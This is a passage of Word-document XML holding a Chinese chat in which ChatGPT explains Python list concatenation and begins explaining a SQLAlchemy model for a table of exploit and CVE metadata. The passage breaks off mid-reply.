        <w:t>上的值在数据库中已经存在，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会更新这一行的其他字段的值。如果不存在，就会插入新的一行。所以，这应该能满足你的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139401C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D469E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果要并另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么做</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116AEA14" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2AA1A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464810F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，如果你想要将两个列表（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）连接起来，有以下几种常用的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7FF94" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D4B699" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算符：这是最简单和直观的方式。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DB94B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166A1E15" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010C913" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list1 = [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE8F48" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list2 = [4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB8B89" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    combined_list = list1 + list2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4C7BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(combined_list)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: [1, 2, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575F3D47" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBEBFA8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> extend() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：这个方法可以将一个列表中的所有元素添加到另一个列表的末尾。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB7B54" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C47238E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702BB07C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list1 = [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E8433" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list2 = [4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C27BCF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list1.extend(list2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68148186" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(list1)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: [1, 2, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9DCE6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765C60FB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这个方法会直接修改原列表，如果你不想改变原列表，你应该使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算符或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> list() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来创建一个新的列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51018015" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419B8C0E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用列表解析：这是一种更高级的方式，它可以在一行中实现更复杂的操作。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758DA8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C4B7B9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C91B01" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list1 = [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051DFDA9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list2 = [4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98FF74" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    combined_list = [item for sublist in [list1, list2] for item in sublist]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CF4CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(combined_list)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: [1, 2, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C978F38" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5E4D22" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> itertools.chain()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这是一种更高级的方法，特别是在处理大量数据时，这种方法的效率较高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1D981" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C226FE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5EC527" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    import itertools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE2BB4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list1 = [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F7D9F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    list2 = [4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2FF87" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    combined_list = list(itertools.chain(list1, list2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70318B72" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(combined_list)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: [1, 2, 3, 4, 5, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF9777" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C227E3B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以选择适合你的情况的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62517AA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADAE448" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class DBPoc(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A747DEA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = 'exp_poc_info'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F593F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DF7431" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24795F62" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    eid = Column(Integer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CF583" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cve = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673844C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A72C0E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    title = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051E3C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    author = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B7F0A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    published_time = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48657C40" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785C6E66" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    verified = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D044661" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780CAC82" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    platform = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1942FD0D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exploit_type = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F29F15" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exploit_url = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDCDC9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exploit_app = Column(String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C53BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E054A96" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, eid, cve,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B1690" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                 title, author, published_time, verified,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D6362" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                 platform, exploit_type, exploit_url, exploit_app):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A94F8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.eid = eid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281DD49" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.cve = cve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1328A4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190ADD5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.title = title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB250E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.author = author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022975FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.published_time = published_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA00D9B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.verified = verified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1636AA9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3BEF17" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.platform = platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78501A6F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.exploit_type = exploit_type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34130B03" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.exploit_url = exploit_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A4123" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.exploit_app = exploit_app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么他这里会写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Column()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，这样会自动存储这个字段吗？给我类似的代码让我学习</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1CDC2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF507C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BF8A0E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义表结构的常用方式。在这个代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
